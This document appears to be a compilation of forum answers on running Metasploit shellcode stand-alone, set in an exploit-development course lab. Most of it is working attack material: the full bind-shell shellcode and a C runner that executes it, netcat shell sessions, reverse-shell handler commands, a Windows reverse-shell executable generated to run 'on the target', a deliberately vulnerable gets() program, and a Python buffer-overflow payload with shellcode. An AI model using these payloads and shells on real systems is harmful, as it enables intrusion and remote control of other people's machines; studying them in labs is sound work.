How to run the linux/x86/shell_bind_tcp payload stand alone?
Generate shellcode, compile and run:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependSetresgid=false,
* PrependSetregid=false, PrependSetgid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now, in terminal 2, check for connections and finally connect using netcat. Note that the $ doesn't appear, but the shell is still there:
max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 3326/shellcode
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max 591 Jan 2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max 591 Jan 2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max 471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max 471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max 442 Jan 2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max 442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max 139 Dec 27 08:18 compile.sh
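The answer above compiles a shellcode.c that it never shows. What follows is an added stand-alone runner written for this page (not the poster's file and not Metasploit code) around the 78 bytes that msfpayload printed. Two things a practitioner should check before trusting the output above: first, the "Shellcode Length: 20" line is what strlen() reports, because the payload contains a null byte (the 0x0002 AF_INET word of the sockaddr_in that "push 0x5c110002" builds for port 4444), so a harness must size the buffer with sizeof(buf) - 1 instead; second, buf is a global in .data, and on Linux 5.8 and later "-z execstack" makes only the stack executable, so the classic global-array harness segfaults there. The runner therefore copies the payload into an anonymous RWX mmap() page before jumping to it. The payload is 32-bit x86 (int 0x80), so build it with gcc -m32 on an x86-64 host. The helper names payload_len, payload_strlen, first_null_offset and payload_port are mine, chosen for the illustration.

```c
/* shellcode.c: stand-alone runner for the msfpayload output shown above.
 * Added example, not the poster's file. Build as 32-bit on an x86-64 host:
 *   gcc -m32 -o shellcode shellcode.c
 * The payload bytes are the 78 bytes msfpayload printed on this page. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <arpa/inet.h>

unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

/* True length: sizeof() counts the string literal's terminating NUL, so drop it. */
size_t payload_len(void) { return sizeof(buf) - 1; }

/* What a harness that measures with strlen() reports: it stops at the first
 * embedded null byte, which is why the page shows "Shellcode Length: 20". */
size_t payload_strlen(void) { return strlen((const char *)buf); }

/* Offset of the first null byte, or -1 if the payload is null-free. */
long first_null_offset(void) {
    for (size_t i = 0; i < payload_len(); i++)
        if (buf[i] == 0) return (long)i;
    return -1;
}

/* Recover LPORT from the payload. The "push 0x5c110002" instruction
 * (bytes 68 02 00 11 5c) builds the sockaddr_in on the stack:
 * sin_family = 0x0002 (AF_INET), then sin_port in network byte order.
 * Scan for the push opcode followed by the AF_INET word instead of
 * hard-coding an offset. Returns 0 if no such push is found. */
uint16_t payload_port(void) {
    size_t n = payload_len();
    for (size_t i = 0; i + 5 <= n; i++) {
        if (buf[i] == 0x68 && buf[i + 1] == 0x02 && buf[i + 2] == 0x00) {
            uint16_t be_port;
            memcpy(&be_port, &buf[i + 3], sizeof be_port);  /* unaligned-safe */
            return ntohs(be_port);
        }
    }
    return 0;
}

int main(void) {
    size_t n = payload_len();
    printf("sizeof: %zu, strlen: %zu, first null at %ld, LPORT %u\n",
           n, payload_strlen(), first_null_offset(), (unsigned)payload_port());

    /* Copy into an anonymous RWX mapping so execution does not depend on
     * READ_IMPLIES_EXEC, which -z execstack no longer grants on Linux >= 5.8. */
    void *mem = mmap(NULL, n, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(mem, buf, n);

    /* Binds 0.0.0.0:4444 and serves /bin/sh to the first client;
     * does not return on success. */
    ((void (*)(void))mem)();
    return 0;
}
```

The netstat check in the answer still applies after running this: the listener shows up on 0.0.0.0:4444 with the runner's PID, and the port printed by payload_port() is the value to look for.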
How to run the linux/x86/shell_reverse_tcp payload stand alone?
It's a reverse shell; it needs something to connect to.
You have to configure and create a reverse handler, something like this:
# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E
Standalone multi/handler reverse_tcp
I don't really know what your constraints/restrictions are.
My guess is that, you want to "receive shells" on a computer without metasploit installed on it.
If that's the case, you could use msfd (Metasploit daemon installed on a different computer) or simply netcat, socat, ...
What do you think of this:
- listening with netcat on 192.168.1.2
# nc -l -p 4444
- Using a shell_reverse_tcp instead
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
- Execute darkbird.exe on the target
execute run -jz once for multiple connections
Found the solution: execute "set ExitOnSession false" before "run -jz". That's what I need.
Exploit Development - GETS and Shellcode
When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.
The solution is to close the stdin descriptor and reopen /dev/tty before executing /bin/sh.
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Deliberately vulnerable (gets() has no bounds check). gets() is gone from
 * the C11 headers, so build with an older dialect, e.g. gcc -std=gnu99. */
int main(void) {
    char buf[50];
    gets(buf);
    printf("Yo %s\n", buf);
    /* Replace fd 0 (e.g. the pipe that fed gets and is now at EOF) with the
     * terminal: after close(0), open() returns the lowest free fd, which is 0. */
    close(0);
    if (open("/dev/tty", O_RDWR | O_NOCTTY) < 0) {
        perror("open /dev/tty");
        return 1;
    }
    char *const argv[] = { "/bin/sh", NULL };   /* give sh a proper argv[0] */
    execve("/bin/sh", argv, NULL);
    perror("execve");   /* only reached if execve failed */
    return 1;
}
Related answer: execve("/bin/sh", 0, 0); in a pipe
It is also possible to execute the payload by using:
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln